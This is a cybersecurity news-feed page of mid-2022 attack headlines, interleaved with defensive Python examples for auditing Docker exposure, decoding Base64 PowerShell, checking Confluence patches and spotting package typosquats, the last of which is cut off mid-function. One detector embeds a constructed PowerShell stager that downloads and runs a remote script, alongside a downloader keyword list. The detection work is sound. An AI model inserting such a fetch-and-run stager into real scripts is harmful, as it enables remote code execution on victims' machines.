PACMAN is a new attack technique demonstrated against Apple M1 processor chipsets that could be used to hack macOS systems. PACMAN is a novel hardware attack technique that can allow attackers to bypass Pointer Authentication (PAC) on the Apple...Security Affairs
June 10, 2022
Threat actors exploit recently disclosed Atlassian Confluence flaw in cryptomining campaign Full Text
Abstract
Threat actors are exploiting the recently disclosed CVE-2022-26134 RCE in Atlassian Confluence servers to deploy cryptocurrency miners. Check Point researchers have observed threat actors exploiting the recently disclosed CVE-2022-26134 remote code...Security Affairs
June 10, 2022
New PACMAN hardware attack targets Macs with Apple M1 CPUs Full Text
Abstract
A new hardware attack on Pointer Authentication in Apple M1 CPUs uses speculative execution to guess pointer authentication codes without triggering a crash, enabling attackers to gain arbitrary code execution on Mac systems.BleepingComputer
June 10, 2022
Iranian hackers target energy sector with new DNS backdoor Full Text
Abstract
The Iranian Lyceum APT hacking group uses a new .NET-based DNS backdoor to conduct attacks on companies in the energy and telecommunication sectors.BleepingComputer
June 9, 2022
Cyber Spetsnaz’s Operation Panopticon Launches Espionage Attacks Full Text
Abstract
Researchers have identified an increase in activity by a new hacktivist group called Cyber Spetsnaz that has been targeting NATO infrastructure. In April, Cyber Spetsnaz created its first division, called Zarya, staffed with experienced penetration testers, OSINT specialists, and hackers. The gro ... Read MoreCyware Alerts - Hacker News
June 09, 2022
Vice Society ransomware claims attack on Italian city of Palermo Full Text
Abstract
The Vice Society ransomware group has claimed responsibility for the recent cyber attack on the city of Palermo in Italy, which has caused a large-scale service outage.BleepingComputer
June 09, 2022
A Decade-Long Chinese Espionage Campaign Targets Southeast Asia and Australia Full Text
Abstract
A previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed Aoqin Dragon has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013. "Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices," SentinelOne researcher Joey Chen said in a report shared with The Hacker News. "Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection." The group is said to have some level of association with another threat actor known as Naikon (aka Override Panda), with campaigns primarily directed against targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Infection chains mounted by Aoqin Dragon have banked on Asia-Pacific political affairs and pornographic-themed docuThe Hacker News
June 9, 2022
Tainted CCleaner Pro cracker spreads via black SEO campaign Full Text
Abstract
Threat actors spread info-stealing malware through the search results for a pirated copy of the CCleaner Pro Windows optimization program. Researchers from Avast have uncovered a malware campaign, tracked as FakeCrack, spreading through the search...Security Affairs
June 9, 2022
MakeMoney malvertising campaign adds fake update template Full Text
Abstract
Malwarebytes researchers identified a malvertising campaign leading to a fake Firefox update. The template is strongly inspired by similar schemes, in particular the one distributed by the FakeUpdates (SocGholish) threat actors.Malwarebytes Labs
June 7, 2022
Follina Exploited by State-Sponsored Hackers Full Text
Abstract
A government-aligned attacker tried using a Microsoft vulnerability to attack U.S. and E.U. government targets.Threatpost
June 07, 2022
Researchers Warn of Spam Campaign Targeting Victims with SVCReady Malware Full Text
Abstract
A new wave of phishing campaigns has been observed spreading a previously documented malware called SVCReady. "The malware is notable for the unusual way it is delivered to target PCs — using shellcode hidden in the properties of Microsoft Office documents," Patrick Schläpfer, a threat analyst at HP, said in a technical write-up. SVCReady is said to be in its early stage of development, with the authors iteratively updating the malware several times last month. First signs of activity date back to April 22, 2022. Infection chains involve sending Microsoft Word document attachments to targets via email that contain VBA macros to activate the deployment of malicious payloads. But where this campaign stands apart is that instead of employing PowerShell or MSHTA to retrieve next-stage executables from a remote server, the macro runs shellcode stored in the document properties, which subsequently drops the SVCReady malware. In addition to achieving persistence on the iThe Hacker News
June 07, 2022
Online gun shops in the US hacked to steal credit cards Full Text
Abstract
Rainier Arms and Numrich Gun Parts, two American gun shops that operate e-commerce sites on rainierarms.com and gunpartscorp.com, have disclosed data breach incidents resulting from card skimmer infections on their sites.BleepingComputer
June 6, 2022
Lockbit ransomware gang claims to have hacked cybersecurity giant Mandiant Full Text
Abstract
LockBit ransomware gang claims to have hacked the cybersecurity firm Mandiant, which is investigating the alleged security breach. Today the LockBit ransomware gang added the cybersecurity firm Mandiant to the list of victims published on its dark web...Security Affairs
June 06, 2022
Mandiant: “No evidence” we were hacked by LockBit ransomware Full Text
Abstract
American cybersecurity firm Mandiant is investigating LockBit ransomware gang's claims that they hacked the company's network and stole data.BleepingComputer
June 6, 2022
SMSFactory Targets Android Users Across Eight Countries Full Text
Abstract
SMSFactory has already targeted more than 165,000 Avast customers from May 2021 to May 2022. Most of the victims were located in Brazil, Ukraine, Argentina, Russia, and Turkey. The main goal is to send premium texts and make calls to premium phone numbers. However, the malware can steal the contact ... Read MoreCyware Alerts - Hacker News
June 06, 2022
Microsoft Seizes 41 Domains Used in Spear-Phishing Attacks by Bohrium Hackers Full Text
Abstract
Microsoft's Digital Crimes Unit (DCU) last week disclosed that it had taken legal proceedings against an Iranian threat actor dubbed Bohrium in connection with a spear-phishing operation. The adversarial collective is said to have targeted entities in tech, transportation, government, and education sectors located in the U.S., Middle East, and India. "Bohrium actors create fake social media profiles, often posing as recruiters," Amy Hogan-Burney of the DCU said in a tweet. "Once personal information was obtained from the victims, Bohrium sent malicious emails with links that ultimately infected their target's computers with malware." According to an ex parte order shared by the tech giant, the goal of the intrusions was to steal and exfiltrate sensitive information, take control over the infected machines, and carry out remote reconnaissance. To halt the malicious activities of Bohrium, Microsoft said it took down 41 ".com," ".infoThe Hacker News
June 6, 2022
Another nation-state actor exploits Microsoft Follina to attack European and US entities Full Text
Abstract
A nation-state actor is attempting to exploit the Follina flaw in a recent wave of attacks against government entities in Europe and the U.S. An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability...Security Affairs
June 6, 2022
WatchDog Targets Docker And Redis Servers In New Cryptojacking Campaign Full Text
Abstract
The group targets misconfigured Docker Engine API endpoints that expose the daemon on TCP port 2375 with default, unauthenticated settings. Once connected, it lists or modifies containers and runs arbitrary shell commands.Cyware Alerts - Hacker News
June 6, 2022
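The WatchDog entry above turns on one misconfiguration: a Docker Engine API listener on TCP (conventionally port 2375) with no TLS client verification, so anyone who can reach the port can drive the daemon. The audit below is an added example, not Docker's or the researchers' tooling. It reads the documented `hosts` and `tlsverify` settings from a daemon.json document and the `-H/--host` and `--tlsverify` flags from a dockerd command line, and reports every listener that is reachable beyond loopback without mutual TLS. The two daemon.json documents at the bottom are constructed samples, one weak and one hardened.

```python
"""Audit a Docker daemon configuration for an Engine API listener exposed on
TCP without TLS client verification. Added example, not Docker's tooling.
Understands the `hosts`/`tlsverify` keys of daemon.json and the -H/--host and
--tlsverify flags of dockerd; the sample configurations are constructed."""
from __future__ import annotations

import json
import shlex
from urllib.parse import urlsplit

PLAINTEXT_PORT = 2375  # Docker's conventional unencrypted API port
TLS_PORT = 2376        # Docker's conventional TLS API port
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def hosts_from_daemon_json(text: str) -> tuple[list[str], bool]:
    """Return (listeners, tlsverify) from a daemon.json document."""
    cfg = json.loads(text)
    return list(cfg.get("hosts", [])), bool(cfg.get("tlsverify", False))

def hosts_from_cmdline(cmdline: str) -> tuple[list[str], bool]:
    """Return (listeners, tlsverify) from a dockerd command line."""
    argv = shlex.split(cmdline)
    hosts, tlsverify = [], False
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg.startswith("-H") and len(arg) > 2:   # -Htcp://... form
            hosts.append(arg[2:])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return hosts, tlsverify

def findings(hosts: list[str], tlsverify: bool) -> list[str]:
    """One finding per listener that exposes the API beyond loopback without mTLS."""
    out = []
    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// sockets are reachable only locally
        addr = u.hostname or ""
        port = u.port or (TLS_PORT if tlsverify else PLAINTEXT_PORT)
        if addr in LOOPBACK:
            continue
        if not tlsverify:
            out.append(f"{h}: Engine API on {addr}:{port} without TLS client verification; "
                       "any client that reaches the port can create containers and run commands")
        elif port == PLAINTEXT_PORT:
            out.append(f"{h}: mTLS enforced, but {PLAINTEXT_PORT} is the plain-text convention "
                       f"that scanners probe; consider {TLS_PORT}")
    return out

def audit_daemon_json(text: str) -> list[str]:
    return findings(*hosts_from_daemon_json(text))

def audit_cmdline(cmdline: str) -> list[str]:
    return findings(*hosts_from_cmdline(cmdline))

# Constructed samples: the exposed default the campaign scans for, and a hardened version.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_json(cfg) or ["no findings"])
    print("cmdline", audit_cmdline("dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"))
```

Run it against `/etc/docker/daemon.json` or the `dockerd` line from `ps`; a listener bound to a non-loopback address with `tlsverify` unset is exactly the exposure the campaign scans for, and the fix is the hardened document (mutual TLS on 2376) or, better, no TCP listener at all.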
Exclusive: Pro-Russia group ‘Cyber Spetsnaz’ is attacking government agencies Full Text
Abstract
Resecurity, Inc. (USA) has identified an increase in hacktivist activity driven by a new group called “Cyber Spetsnaz”; the groups are leveraging...Security Affairs
June 05, 2022
State-Backed Hackers Exploit Microsoft ‘Follina’ Bug to Target Entities in Europe and U.S Full Text
Abstract
A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S. Enterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is tracked as CVE-2022-30190 (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets. "This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253," the company said in a series of tweets. The payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named "seller-notification[.]live." "This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine reconThe Hacker News
June 04, 2022
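The Follina payload above is a Base64-encoded PowerShell downloader. The detector below is an added example, not Proofpoint's or Microsoft's detection logic. It decodes long base64 tokens found in a process command line and flags downloader cmdlets in the result. `powershell.exe -EncodedCommand` (short form `-enc`) takes UTF-16LE text in base64, so that codec is chosen when the decoded bytes show the tell-tale zero in every odd position; plain UTF-8 covers scripts embedded via FromBase64String. The two command lines at the bottom are constructed; `192.0.2.10` is an RFC 5737 documentation address, not an indicator from any report.

```python
"""Decode Base64-wrapped PowerShell and flag downloader behaviour.
Added example; not a vendor's detection. The sample command lines are constructed."""
from __future__ import annotations

import base64
import binascii
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64 runs only
DOWNLOADER_HINTS = ("invoke-webrequest", "iwr ", "net.webclient", "downloadstring",
                    "downloadfile", "start-bitstransfer", "invoke-expression", "iex ")

def decode_powershell_blob(blob: str) -> str | None:
    """Return the script text if `blob` is base64 of readable text, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    # -EncodedCommand is UTF-16LE: ASCII script text has a zero in every odd byte.
    # Decide the codec from that rather than trying UTF-16 blindly, because ASCII
    # bytes decoded as UTF-16 come out as printable-looking CJK noise.
    utf16 = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    try:
        text = raw.decode("utf-16-le" if utf16 else "utf-8")
    except UnicodeDecodeError:
        return None
    readable = sum(c.isprintable() or c in "\r\n\t" for c in text)
    return text if text and readable >= 0.95 * len(text) else None

def inspect_command_line(cmdline: str) -> dict:
    """Decode every long base64 token in a command line and report downloader indicators."""
    decoded = [t for t in map(decode_powershell_blob, B64_TOKEN.findall(cmdline)) if t]
    hints = sorted({h.strip() for d in decoded for h in DOWNLOADER_HINTS if h in d.lower()})
    return {"decoded": decoded, "downloader_hints": hints, "suspicious": bool(hints)}

# Constructed samples: a hidden-window encoded stager and a benign scheduled script.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
SUSPICIOUS_CMDLINE = ("powershell.exe -w hidden -nop -enc "
                      + base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii"))
BENIGN_CMDLINE = r"powershell.exe -NoProfile -File C:\Scripts\rotate-logs.ps1"

if __name__ == "__main__":
    for c in (SUSPICIOUS_CMDLINE, BENIGN_CMDLINE):
        print(inspect_command_line(c))
```

Feed it the command-line field of process-creation events (Sysmon event 1, or Security event 4688 with command-line auditing on); in the Follina chain the interesting parent is msdt.exe rather than the user's shell, so pair the decoded content with the parent process when you write the rule.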
Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild Full Text
Abstract
Atlassian on Friday rolled out fixes to address a critical security flaw affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution. Tracked as CVE-2022-26134, the issue is similar to CVE-2021-26084 — another security flaw the Australian software company patched in August 2021. Both relate to a case of Object-Graph Navigation Language (OGNL) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance. The newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1. According to stats from internet asset discovery platform Censys, there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian ConfluencThe Hacker News
June 3, 2022
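The fix list in the entry above is per release branch, which makes "am I patched?" a branch-aware comparison rather than a single version threshold. The checker below is an added example, not Atlassian tooling. Its `FIXED_VERSIONS` and the "1.3.0 and later is affected" cut-off come from the entry; how an unlisted branch is handled (older unsupported branches count as vulnerable with no fix on that branch, anything newer than the newest listed fix counts as fixed) is this example's assumption.

```python
"""Check a Confluence Server / Data Center version against the CVE-2022-26134
fix list. Added example, not Atlassian tooling. FIXED_VERSIONS comes from the
advisory summary; treatment of unlisted branches is an assumption (see assess)."""
from __future__ import annotations

import re

FIXED_VERSIONS = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]
FIRST_AFFECTED = (1, 3, 0)   # assumption: releases below this are out of scope

def parse_version(text: str) -> tuple[int, int, int]:
    """'7.13.6' or '7.13.6-m1' -> (7, 13, 6); a missing patch level counts as 0."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised Confluence version: {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def fmt(v: tuple[int, int, int]) -> str:
    return ".".join(map(str, v))

# major.minor branch -> first fixed release on that branch
FIX_BY_BRANCH = {v[:2]: v for v in map(parse_version, FIXED_VERSIONS)}
NEWEST_FIX = max(FIX_BY_BRANCH.values())

def assess(version: str) -> str:
    v = parse_version(version)
    if v < FIRST_AFFECTED:
        return "not affected"
    fix = FIX_BY_BRANCH.get(v[:2])
    if fix is None:
        if v > NEWEST_FIX:
            # Assumption: anything released after the newest listed fix ships the fix.
            return "fixed (release newer than the advisory's fix list)"
        # Affected branch without a fix release: the only remedy is a supported branch.
        return f"vulnerable (unsupported branch; upgrade to {fmt(NEWEST_FIX)} or later)"
    return "fixed" if v >= fix else f"vulnerable (upgrade to {fmt(fix)})"

if __name__ == "__main__":
    for sample in ["7.13.6", "7.13.7", "7.18.0", "7.18.1", "7.12.5", "7.19.2", "1.2.9"]:
        print(f"{sample:>7}  {assess(sample)}")
```

The version string is exposed on the login page footer and in the `X-Confluence-Request-Time`-less REST status endpoints of many instances, so this pairs naturally with an inventory export; the branch lookup is what prevents a 7.12.x host from being mistaken for patched just because 7.12.5 sorts above 7.4.17.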
Several Elasticsearch Databases Attacked for Ransom Full Text
Abstract
Secureworks spotted a new campaign targeting vulnerable Elasticsearch databases and replacing their indexes with a ransom note; a total of $280,000 in ransoms has been demanded. The attackers used an automated script to find unprotected databases, wipe their data, and add the ransom note. Admins ... Read MoreCyware Alerts - Hacker News
June 03, 2022
Novartis says no sensitive data was compromised in cyberattack Full Text
Abstract
Pharmaceutical giant Novartis says no sensitive data was compromised in a recent cyberattack by the Industrial Spy data-extortion gang.BleepingComputer
June 03, 2022
Chinese LuoYu Hackers Using Man-on-the-Side Attacks to Deploy WinDealer Backdoor Full Text
Abstract
An "extremely sophisticated" Chinese-speaking advanced persistent threat (APT) actor dubbed LuoYu has been observed using a malicious Windows tool called WinDealer that's delivered by means of man-on-the-side attacks. "This groundbreaking development allows the actor to modify network traffic in-transit to insert malicious payloads," Russian cybersecurity company Kaspersky said in a new report. "Such attacks are especially dangerous and devastating because they do not require any interaction with the target to lead to a successful infection." Known to be active since 2008, organizations targeted by LuoYu are predominantly foreign diplomatic organizations established in China and members of the academic community as well as financial, defense, logistics, and telecommunications companies. LuoYu's use of WinDealer was first documented by Taiwanese cybersecurity firm TeamT5 at the Japan Security Analyst Conference (JSAC) in January 2021. SThe Hacker News
June 03, 2022
Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies Full Text
Abstract
Microsoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium. In addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created and that it notified affected organizations. "The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques," MSTIC assessed with "moderate confidence." The adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022. Targets of interest included entities in the manufacturing, IT, transpoThe Hacker News
June 3, 2022
Microsoft blocked Polonium attacks against Israeli organizations Full Text
Abstract
Microsoft blocked attack activity aimed at Israeli organizations and attributed it to a previously unknown Lebanon-based hacking group tracked as POLONIUM. Microsoft announced that it has blocked a series of attacks targeting Israeli organizations that have...Security Affairs
June 3, 2022
Russia is ‘failing’ in its mission to destabilize Ukraine’s networks after a series of thwarted cyber-attacks Full Text
Abstract
Since even before its invasion of Ukraine began on February 24, 2022, Russia has conducted a series of cyberattacks against both the country’s internet infrastructure and other critical services in an attempt to destabilize Ukraine.The Daily Swig
June 02, 2022
Critical Atlassian Confluence zero-day actively used in attacks Full Text
Abstract
Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time.BleepingComputer
June 2, 2022
LockBit ransomware attack impacted production in a Mexican Foxconn plant Full Text
Abstract
LockBit ransomware gang claimed responsibility for an attack against the electronics manufacturing giant Foxconn that impacted production in Mexico. The electronics manufacturing giant Foxconn confirmed that its production plant in Tijuana (Mexico)...Security Affairs
June 02, 2022
Microsoft blocks Polonium hackers from using OneDrive in attacks Full Text
Abstract
Microsoft said it blocked a Lebanon-based hacking group it tracks as Polonium from using the OneDrive cloud storage platform for data exfiltration and command and control while targeting and compromising Israeli organizations.BleepingComputer
June 02, 2022
Chinese LuoYu hackers deploy cyber-espionage malware via app updates Full Text
Abstract
A Chinese-speaking hacking group known as LuoYu is infecting victims with the WinDealer information stealer, delivered by swapping legitimate app updates for malicious payloads in man-on-the-side attacks.BleepingComputer
June 01, 2022
Hundreds of Elasticsearch databases targeted in ransom attacks Full Text
Abstract
A campaign targeting poorly secured Elasticsearch databases has deleted their contents and dropped ransom notes on 450 instances, demanding a payment of $620 to give them back their indexes, totaling a demand of $279,000.BleepingComputer
June 1, 2022
Hive ransomware gang hit Costa Rica public health service Full Text
Abstract
Costa Rican Social Security Fund, Costa Rica's public health service, was hit by a Hive ransomware attack. Costa Rican Social Security Fund, Costa Rica's public health service (aka CCSS), was hit today by a Hive ransomware attack, BleepingComputer...Security Affairs
June 1, 2022
Researchers Devise Attack Using IoT and IT to Deliver Ransomware Against OT Full Text
Abstract
Attacks against OT are harder to pull off, but their effects are correspondingly harder to mitigate. The evolution of cyber extortion makes this more than just a possible development.Security Week
June 01, 2022
Ransomware attacks need less than four days to encrypt systems Full Text
Abstract
The duration of ransomware attacks in 2021 averaged 92.5 hours, measured from initial network access to payload deployment. In 2020, ransomware actors spent an average of 230 hours to complete their attacks and 1637.6 hours in 2019.BleepingComputer
May 31, 2022
SideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years Full Text
Abstract
An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020. "Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations," cybersecurity firm Kaspersky said in a report that was presented at Black Hat Asia this month. SideWinder, also called Rattlesnake or T-APT-04, is said to have been active since at least 2012 with a track record of targeting military, defense, aviation, IT companies, and legal firms in Central Asian countries such as Afghanistan, Bangladesh, Nepal, and Pakistan. Kaspersky's APT trends report for Q1 2022 published late last month revealed that the threat actor is actively expanding the geography of its targets beyond its traditional victim profile to otherThe Hacker News
May 31, 2022
Experts warn of ransomware attacks against government organizations of small states Full Text
Abstract
Cyber Research Labs reported a rise in ransomware attacks in the second quarter of 2022; small states are more exposed to these attacks. Cyber Research Labs observed a rise in ransomware attacks in the second quarter of 2022, some of them with a severe...Security Affairs
May 31, 2022
Costa Rica’s public health agency hit by Hive ransomware Full Text
Abstract
All computer systems on the network of Costa Rica's public health service (known as Costa Rican Social Security Fund or CCSS) are now offline following a Hive ransomware attack that hit them this morning.BleepingComputer
May 31, 2022
Experts warn of ransomware attacks against government organizations of small states Full Text
Abstract
The experts at Cyber Research Labs warn of ransomware attacks against government organizations. They observed a total of 48 government organizations from 21 countries that were hit by 13 ransomware attacks in 2022.Security Affairs
May 30, 2022
North Orange County Community College District was hit by ransomware in January Full Text
Abstract
Cypress College and Fullerton College experienced a ransomware attack. They immediately took steps to confirm the security of their systems, including the deployment of an advanced threat protection and monitoring tool.Data Breaches
May 30, 2022
New Microsoft Office zero-day used in attacks to execute PowerShell Full Text
Abstract
Security researchers have discovered a new Microsoft Office zero-day vulnerability that is being used in attacks to execute malicious PowerShell commands via Microsoft Diagnostic Tool (MSDT) simply by opening a Word document.BleepingComputer
May 30, 2022
GoodWill Ransomware victims have to perform socially driven activities to decrypt their data Full Text
Abstract
Researchers discovered a new ransomware family called GoodWill that asks victims to donate the ransom for social causes. CloudSEK’s Threat Intelligence Research team has disclosed a new ransomware strain called GoodWill, that demands...Security Affairs
May 30, 2022
Document Exploiting New Microsoft Office Zero-Day Seen in the Wild Full Text
Abstract
On May 27, a researcher who uses the online moniker “nao_sec” reported on Twitter that they had found an interesting malicious document on the VirusTotal malware scanning service.Security Week
May 29, 2022
New ‘GoodWill’ Ransomware Forces Victims to Donate Money and Clothes to the Poor Full Text
Abstract
Cybersecurity researchers have disclosed a new ransomware strain called GoodWill that compels victims to donate to social causes and provide financial assistance to people in need. "The ransomware group propagates very unusual demands in exchange for the decryption key," researchers from CloudSEK said in a report published last week. "The Robin Hood-like group claims to be interested in helping the less fortunate, rather than extorting victims for financial motivations." Written in .NET, the ransomware was first identified by the India-based cybersecurity firm in March 2022; infections encrypt sensitive files, leaving them inaccessible without the decryption key. The malware, which uses the AES algorithm for encryption, is also notable for sleeping for 722.45 seconds to interfere with dynamic analysis. The encryption process is followed by displaying a multiple-paged ransom note that requires the victims to carry out three socially-driven activitieThe Hacker News
May 26, 2022
Experts warn of a new malvertising campaign spreading the ChromeLoader Full Text
Abstract
Researchers from Red Canary observed a new malvertising campaign spreading the ChromeLoader malware, which hijacks victims' browsers. ChromeLoader...Security Affairs
May 26, 2022
Microsoft shares mitigation for Windows KrbRelayUp LPE attacks Full Text
Abstract
Microsoft has shared guidance to help admins defend their Windows enterprise environments against KrbRelayUp attacks that enable attackers to gain SYSTEM privileges on Windows systems with default configurations.BleepingComputer
May 25, 2022
Researchers Find New Malware Attacks Targeting Russian Government Entities Full Text
Abstract
An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda. The attack chains, while leveraging different lures over the course of two months, all employed the same malware barring small differences in the source code. The campaign is said to have commenced around February 26, days after Russia's military invasion of Ukraine, with the emails distributing the RAT under the guise of an interacThe Hacker News
May 25, 2022
SpiceJet airline passengers stranded after ransomware attack Full Text
Abstract
Indian low-cost airline SpiceJet has informed its customers of an attempted ransomware attack that has impacted some of its systems and caused delays on flight departures today.BleepingComputer
May 24, 2022
Hackers target Russian govt with fake Windows updates pushing RATs Full Text
Abstract
Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.BleepingComputer
May 23, 2022
General Motors credential stuffing attack exposes car owners info Full Text
Abstract
US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed customer information and allowed hackers to redeem rewards points for gift cards.BleepingComputer
May 23, 2022
Threat Actors Target the Infosec Community with Fake PoC Exploits Full Text
Abstract
An account was found sharing fake proof-of-concept (PoC) exploit code for an RPC Runtime Library remote code execution flaw (CVE-2022-26809, CVSS 9.8). The malware, disguised as PoC code, was hosted on GitHub.Security Affairs
May 23, 2022
Russian hackers perform reconnaissance against Austria, Estonia Full Text
Abstract
In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College.BleepingComputer
May 21, 2022
Asian media company Nikkei suffered a ransomware attack Full Text
Abstract
The media company Nikkei has disclosed a ransomware attack and revealed that the incident might have impacted customer data. The Japan-based media company Nikkei is focused on the business and financial industry; it is the world's largest financial...Security Affairs
May 20, 2022
QNAP warns of a new wave of DeadBolt ransomware attacks against its NAS devices Full Text
Abstract
Taiwanese vendor QNAP warned customers of a new wave of DeadBolt ransomware attacks and urges them to install the latest updates on their NAS devices and avoid exposing them on the Internet. The...Security Affairs
May 20, 2022
The activity of the Linux XorDdos bot increased by 254% over the last six months Full Text
Abstract
Microsoft researchers have observed a spike in the activity of the Linux bot XorDdos over the last six months. XorDdos, also known as XOR.DDoS, first appeared in the threat landscape in 2014; it is a Linux botnet that has been employed in attacks...Security Affairs
May 20, 2022
Researchers Uncover Rust Supply Chain Attack Targeting Cloud CI Pipelines Full Text
Abstract
A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware. Cybersecurity firm SentinelOne dubbed the attack "CrateDepression." Typosquatting attacks take place when an adversary mimics the name of a popular package on a public registry in hopes that developers will accidentally download the malicious package instead of the legitimate library. In this case, the crate in question is "rustdecimal," a typosquat of the real "rust_decimal" package that's been downloaded over 3.5 million times to date. The package was flagged earlier this month on May 3 by Askar Safin, a Moscow-based developer. According to an advisory published by the Rust maintainers, the crate is said to have been first pushed on March 25, 2022, attracting fewer than 500 downloads before it was permanently removed from the repository.The Hacker News
May 20, 2022
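The CrateDepression entry above describes a separator-dropping typosquat (`rustdecimal` for `rust_decimal`). The checker below is an added example, not SentinelOne's or the Rust project's code. It goes a step beyond the single case in the text: it canonicalises names the way crates.io does (treating `-` and `_` as the same character), then compares separator-stripped forms and an edit distance that counts adjacent swaps as one edit, so dropped separators, single typos and transposed letters are all caught against a watch-list of popular names. `POPULAR_PACKAGES` is a constructed sample; only `rust_decimal` comes from the entry.

```python
"""Flag dependency names that look like typosquats of popular packages.
Added example; not SentinelOne's or the Rust project's code. POPULAR_PACKAGES
is a constructed sample list; only rust_decimal appears in the text above."""
from __future__ import annotations

POPULAR_PACKAGES = ["rust_decimal", "serde", "tokio", "rand", "regex", "hyper", "clap"]

def canonical(name: str) -> str:
    """Lowercase and unify the separators crates.io treats as interchangeable."""
    return name.strip().lower().replace("-", "_")

def stripped(name: str) -> str:
    """Drop separators entirely: 'rust_decimal' -> 'rustdecimal'."""
    return canonical(name).replace("_", "")

def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertions, deletions, substitutions
    and swaps of adjacent characters each cost 1."""
    prev2: list[int] | None = None
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i] + [0] * len(b)
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cur[j] = min(cur[j], prev2[j - 2] + 1)   # adjacent transposition
        prev2, prev = prev, cur
    return prev[len(b)]

def lookalike_of(candidate: str, popular: list[str] = POPULAR_PACKAGES,
                 max_distance: int = 1, min_length: int = 4) -> str | None:
    """Return the popular package `candidate` imitates, or None.
    An exact canonical match is the real package and is never a lookalike."""
    c = canonical(candidate)
    targets = {canonical(p): p for p in popular}
    if c in targets:
        return None
    cs = stripped(c)
    if len(cs) < min_length:
        return None  # very short names collide by accident; judge them by hand
    for pc, original in targets.items():
        ps = stripped(pc)
        if cs == ps or osa_distance(cs, ps) <= max_distance:
            return original
    return None

def review_manifest(deps: list[str]) -> dict[str, str]:
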